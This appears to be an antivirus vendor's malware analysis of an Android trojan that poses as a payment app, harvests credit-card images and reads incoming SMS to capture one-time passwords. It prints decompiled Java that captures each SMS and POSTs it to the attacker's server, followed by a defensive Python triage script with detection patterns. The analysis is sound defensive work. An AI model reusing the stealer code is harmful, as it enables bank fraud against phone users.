Trojan.Android.SmsSpy.Irpardakht

Overview

Type: Trojan

Destruction Level: Moderate

Prevalence: Moderate

What is the Trojan?

Trojans are a class of malware that present themselves as harmless, legitimate software and behave like useful applications, but cause serious damage to the system once executed. Common infection vectors are software downloaded from the internet, content embedded in HTML pages, and email attachments. Unlike viruses and computer worms, Trojans do not replicate themselves.

What is SmsSpy.Irpardakht malware family?

A number of malicious applications aimed at phishing and at gaining access to users' bank accounts are distributed through well-known markets such as Café Bazaar and Myket, as well as through dubious sites and markets, Telegram channels, and SMS messages containing malicious links. This kind of malware presents itself as a legitimate, useful application, but not only provides no real service, it steals the user's sensitive information through phishing.

Their approach is to lure victims with false offers such as payment services, access to judicial services, and other financial and banking services, and sometimes to demand a sum of money through fake payment pages. As soon as the user enters their information (in the case of this malware, an image of the credit card), the attacker receives it; with access to the victim's SMS messages and mobile data, the attacker can also obtain the second (dynamic) password and easily steal the money.


Technical Review
Signs of Infection

When installed, the Vam Pey malware application requests permissions such as reading and receiving SMS. After installation it displays the following screen and, after collecting the user's personal information and an authentication step, asks the user to upload a picture of their national card, their ID card, their credit card, and themselves. If the user uploads a picture of their credit card, the attacker, who can also read incoming SMS, obtains the user's dynamic password and can easily steal all of the user's money.

Performance Description

The “Ir.pardakht.MainActivity” Activity

In this activity the malware notifies its server that the user has installed it by sending the phone's build ID in a POST request.

It then loads https://img.pikacu.site/vampey/index.htm inside a WebView.

The Ir.pardakht.Sms receiver

The receiver is triggered as soon as an SMS message is received.

The receiver uses the SmsMessage class and its methods to steal the user's SMS messages:

getDisplayOriginatingAddress() method: obtains the sender's phone number

getDisplayMessageBody() method: obtains the message text

public void onReceive(Context context, Intent intent) {
    Bundle extras = intent.getExtras();
    if (extras != null) {
        try {
            // Each PDU in the broadcast is one received SMS
            for (Object obj : (Object[]) extras.get("pdus")) {
                SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
                String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
                String displayMessageBody = createFromPdu.getDisplayMessageBody();
                // Sender number and message text are kept in fields read later by SendPostRequest
                this.num = displayOriginatingAddress;
                this.txt = displayMessageBody;
                Log.i("SmsReceiver", ".");
                Toast.makeText(context, ".", 1).show();
                try {
                    // Upload the captured message to the attacker's server
                    new SendPostRequest(this).execute(new String[0]);
                } catch (Exception e) {
                    Toast.makeText(context, "SMS faild, please try again later!", 1).show();
                    e.printStackTrace();
                }
            }
        } catch (Exception e2) {
            Log.e("SmsReceiver", new StringBuffer().append("Exception smsReceiver").append(e2).toString());
        }
    }
}

In this receiver, the malware sends the user's SMS messages to its malicious server https://img.pikacu.site/vampey/app.php as JSON using the POST method.

protected String doInBackground2(String... Starr) {
    try {
        URL url = new URL("https://img.pikacu.site/vampey/app.php");
        // Payload: device build ID plus the sender number and text captured by the receiver
        JSONObject jSONObject = new JSONObject();
        jSONObject.put("id", Build.ID);
        jSONObject.put("link", "");
        jSONObject.put("msg", this.this$0.txt);
        jSONObject.put("num", this.this$0.num);
        Log.e("params", jSONObject.toString());
        HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();
        httpURLConnection.setReadTimeout(15000);
        httpURLConnection.setConnectTimeout(15000);
        httpURLConnection.setRequestMethod("POST");
        httpURLConnection.setDoInput(true);
        httpURLConnection.setDoOutput(true);
        OutputStream outputStream = httpURLConnection.getOutputStream();
        BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream, "UTF-8"));
        bufferedWriter.write(this.this$0.getPostDataString(jSONObject));
        bufferedWriter.flush();
        bufferedWriter.close();
        outputStream.close();
        int responseCode = httpURLConnection.getResponseCode();
        if (responseCode == 200) {
            // Only the first line of the server's reply is returned
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream()));
            StringBuffer stringBuffer = new StringBuffer("");
            String readLine = bufferedReader.readLine();
            if (readLine != null) {
                stringBuffer.append(readLine);
            }
            bufferedReader.close();
            return stringBuffer.toString();
        }
        return new StringBuffer().append("false : ").append(responseCode).toString();
    } catch (Exception e) {
        return new StringBuffer().append("Exception: ").append(e.getMessage()).toString();
    }
}
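As an added defender-side example (not code from the original analysis), the following Python triage script checks an APK's decoded manifest and decompiled source for the pattern described above: the RECEIVE_SMS permission, a receiver registered for incoming SMS, PDU parsing with SmsMessage, and a POST that carries the message body. The manifest and source snippets are constructed to mirror the page (the package name is assumed from the class names quoted there); the server URL is the one quoted in the analysis.

```python
import re
import xml.etree.ElementTree as ET

# Constructed manifest excerpt modelled on the behaviour described above (not the real APK's manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="ir.pardakht">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application><receiver android:name="ir.pardakht.Sms">
    <intent-filter><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
  </receiver></application>
</manifest>"""

# Constructed decompiled-source excerpt echoing the receiver and uploader shown on the page.
SAMPLE_SOURCE = """for (Object obj : (Object[]) extras.get("pdus")) {
    SmsMessage m = SmsMessage.createFromPdu((byte[]) obj);
    this.num = m.getDisplayOriginatingAddress();
    this.txt = m.getDisplayMessageBody();
}
URL url = new URL("https://img.pikacu.site/vampey/app.php");
jSONObject.put("msg", this.this$0.txt);
httpURLConnection.setRequestMethod("POST");"""

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"  # ElementTree key for android:name
SOURCE_PATTERNS = {  # behaviours visible in the decompiled receiver and uploader
    "reads_sms_pdus": r'extras\.get\("pdus"\)|createFromPdu\(',
    "extracts_sender_and_body": r'getDisplayOriginatingAddress\(\)[\s\S]*getDisplayMessageBody\(\)',
    "posts_sms_body": r'put\("msg"[\s\S]*setRequestMethod\("POST"\)',
    "hardcoded_url": r'new URL\("(https?://[^"]+)"\)',  # group 1 keeps the server for blocklisting
}

def manifest_findings(manifest_xml):  # flag the SMS permission and any receiver for incoming SMS
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID_NAME) for p in root.iter("uses-permission")}
    findings = ["perm_receive_sms"] if "android.permission.RECEIVE_SMS" in perms else []
    for rcv in root.iter("receiver"):
        if any(a.get(ANDROID_NAME) == "android.provider.Telephony.SMS_RECEIVED" for a in rcv.iter("action")):
            findings.append("sms_received_receiver:" + rcv.get(ANDROID_NAME))
    return findings

def source_findings(src):  # match harvesting/exfiltration patterns; a matched URL is appended to its tag
    findings = []
    for tag, pattern in SOURCE_PATTERNS.items():
        if m := re.search(pattern, src):
            findings.append(f"{tag}:{m.group(1)}" if m.groups() else tag)
    return findings

def triage(manifest_xml, src):
    findings = manifest_findings(manifest_xml) + source_findings(src)
    tags = {f.split(":", 1)[0] for f in findings}
    # SMS interception combined with a POST carrying the message body is the SmsSpy signature.
    verdict = "likely SMS stealer" if {"perm_receive_sms", "reads_sms_pdus", "posts_sms_body"} <= tags else "inconclusive"
    return verdict, findings
```

Run `triage(SAMPLE_MANIFEST, SAMPLE_SOURCE)` to see the verdict and the individual findings, including the extracted server URL, for the constructed sample.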

How to deal with and clean the system?

To make sure your system is safe, it is strongly recommended to install Padvish Antivirus, keep its signature database updated, and scan your system regularly.

How to prevent your phone from infection:

  • Don't download and install applications from untrusted and unauthorized app stores.
  • Pay attention to the permissions an application requests when installing it.
  • Back up your data and important files on your phone regularly.
  • Don't use unofficial versions of applications. Applications such as Telegram and Instagram have many unofficial versions that are distributed through Telegram channels.
